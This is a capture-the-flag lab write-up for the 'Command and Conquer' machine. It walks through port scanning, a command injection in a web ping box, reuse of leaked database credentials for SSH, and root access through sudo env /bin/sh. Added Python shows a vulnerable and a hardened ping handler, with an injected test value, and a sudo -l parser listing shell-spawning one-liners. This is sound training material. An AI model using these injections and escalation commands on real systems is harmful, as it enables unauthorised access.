Command and Conquer
This is my writeup for the Command and Conquer that was created by my friend, CrimsonFlea.
As always (and as instructed), we start by enumerating. Running a simple Nmap scan with default scripts and version detection:
nmap -sC -sV -T4 10.10.x.x
Starting Nmap 7.60 ( https://nmap.org ) at 2023-09-11 19:30 BST
Nmap scan report for ip-10-10-170-230.eu-west-1.compute.internal (10.10.170.230)
Host is up (0.0010s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Command and Crush
MAC Address: 02:E1:DB:A5:D4:0F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.55 seconds
Our results show two open ports. To compromise the host as fast as possible we should start with port 80, since we have no credentials to try against SSH on port 22.
Heading to the application using the machine's IP, we can see it's a chess blog. To save you the time, I have crawled all of the links in the application, and they are all dead.

So now we have to enumerate on our own and see if we can find any subdomains or subdirectories. We don't really have a good idea what the domain name is, so it is better to try subdirectories first.
I personally use GoBuster, but use whatever you'd like for this. Running a common subdirectory wordlist with GoBuster, we get the following.
Navigating to that subdirectory, we find the backend of the application, which exposes things such as server information and even the ability to ping other machines; we can confirm this by pinging the local host, 127.0.0.1.

Naturally, I would try to break out of this and see if we can get Remote Code Execution on the backend, so that we can turn it into a reverse shell for easier enumeration. (You can enumerate through the ping box too, but it is a lot harder.)

Cool! It looks like we can break out of the ping command. Let's start a netcat listener on port 4444 and see if we can get a reverse shell back to it.
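The ping box is a textbook OS command injection: the user-supplied address is glued into a shell command line, so a separator such as ";" lets us append our own command. As an added illustration (this is not the room's PHP source, which the writeup does not show), here is a Python model of the vulnerable handler beside a hardened one. The function names and the sample payload are my own assumptions.

```python
import ipaddress
import subprocess


def vulnerable_ping(target: str) -> str:
    """Vulnerable pattern: the target is spliced into a shell command string,
    so a value like "127.0.0.1; id" runs a second command after ping."""
    cmd = f"ping -c 1 {target}"  # string concatenation + shell=True: injectable
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=30)
    return result.stdout + result.stderr


def validate_target(target: str) -> str:
    """Accept only a bare IPv4/IPv6 address and raise ValueError for anything else.
    ipaddress rejects hostnames, whitespace and every shell metacharacter."""
    return str(ipaddress.ip_address(target.strip()))


def is_valid_target(target: str) -> bool:
    """Convenience wrapper so callers can test a value without catching exceptions."""
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def safe_ping(target: str) -> str:
    """Hardened pattern: validate first, then pass an argv list with no shell,
    so the target can only ever be a single argument to ping."""
    addr = validate_target(target)
    result = subprocess.run(["ping", "-c", "1", addr], capture_output=True, text=True, timeout=30)
    return result.stdout + result.stderr
```

With the vulnerable handler, a constructed payload such as "127.0.0.1; echo INJECTED" still runs the second command even when ping itself fails; the hardened handler refuses the same value before anything is executed. The same idea is what a reverse shell payload in the ping box relies on, just with a longer command after the separator.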

We have a shell!! Now we can enumerate much faster. Running ls doesn't show much, so let's move up a directory.

This folder has a bunch of files, and what specifically stuck out to me was config.php.bak. The web application user can read it, and when we open it up we find database credentials. Backup copies of configuration files left next to the application are a classic source of leaked secrets.

Trying those database credentials against SSH, we find they are valid, so the same password has been reused for the gkasparov account. From here we can grab the user flag from the home directory, /home/gkasparov/user.txt.

The next objective is root.txt. Simply trying to cat the file gives a permission denied error, so now it is a matter of escalating our privileges to a user who can read it.
We can enumerate our privileges with a few commands: whoami shows the current user, id shows its uid and group memberships, and sudo -l lists what we are allowed to run through sudo.
Running sudo -l, we see that the user gkasparov is allowed to run the env command through sudo.

Running env on its own just prints the environment variables. Okay, but how do we abuse this?
Running env /bin/sh by itself gets us nowhere, since it only spawns a shell as our current user. The point is that env executes whatever program it is given, so if sudo lets us run env as root, env will happily execute /bin/sh as root too.
Combining the two as sudo env /bin/sh drops us into a new shell. Running whoami now returns root! So let's go and read the root flag.

Reference: https://gtfobins.github.io/gtfobins/env/
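The sudo -l step above is worth automating, because the same check recurs on almost every box. The following is an added Python helper, not part of the writeup, that parses sudo -l output and flags rules whose binary is a known shell spawner, producing the GTFOBins-style invocation. The sample output is constructed: the hostname "target" and the systemctl rule are made up, and only the env entry mirrors what the writeup describes (the page does not show the real output, so whether NOPASSWD was set is an assumption here).

```python
import re
from dataclasses import dataclass

# Constructed sample of `sudo -l` output; not the real output from the room.
SUDO_L_OUTPUT = """\
Matching Defaults entries for gkasparov on target:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User gkasparov may run the following commands on target:
    (ALL : ALL) NOPASSWD: /usr/bin/env
    (root) /usr/bin/systemctl status apache2
"""

# Binaries that hand over a shell when run via sudo, with the GTFOBins one-liner.
# "{bin}" is replaced with the full path taken from the sudo rule.
SHELL_SPAWNERS = {
    "env": "{bin} /bin/sh",
    "find": "{bin} . -exec /bin/sh \\; -quit",
    "vim": "{bin} -c ':!/bin/sh'",
    "awk": "{bin} 'BEGIN {{system(\"/bin/sh\")}}'",
    "python3": "{bin} -c 'import os; os.system(\"/bin/sh\")'",
}

# One rule line: "(runas_user : runas_group) TAG: TAG: command args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")


@dataclass
class SudoRule:
    runas_user: str  # first element inside the parentheses, e.g. "ALL" or "root"
    nopasswd: bool   # True when the NOPASSWD: tag is present
    command: str     # the command spec, e.g. "/usr/bin/env"


def parse_sudo_l(text: str) -> list[SudoRule]:
    """Extract the rule lines that follow 'may run the following commands'."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue  # skip the Defaults section
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()
        tags = m.group("tags").replace(":", " ").split()
        rules.append(SudoRule(runas_user, "NOPASSWD" in tags, m.group("cmd")))
    return rules


def escalation_candidates(rules: list[SudoRule]) -> list[tuple[str, str]]:
    """Return (command, suggested invocation) for rules whose binary can spawn a shell
    as root. Rules with fixed arguments are skipped: sudo would not let us change them."""
    out = []
    for rule in rules:
        if rule.runas_user not in ("ALL", "root"):
            continue
        parts = rule.command.split()
        binary = parts[0]
        name = binary.rsplit("/", 1)[-1]
        if name in SHELL_SPAWNERS and len(parts) == 1:
            out.append((rule.command, "sudo " + SHELL_SPAWNERS[name].format(bin=binary)))
    return out


if __name__ == "__main__":
    for cmd, howto in escalation_candidates(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"{cmd}: try `{howto}`")
```

On a real box you would feed it the captured output (for example `sudo -l 2>&1 | python3 check.py` with a small stdin wrapper) rather than the constructed string; the point of the argument-count check is that a rule like "/usr/bin/systemctl status apache2" pins the arguments, so it cannot be turned into a shell the way a bare /usr/bin/env can.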
Boom! We have rooted the machine :)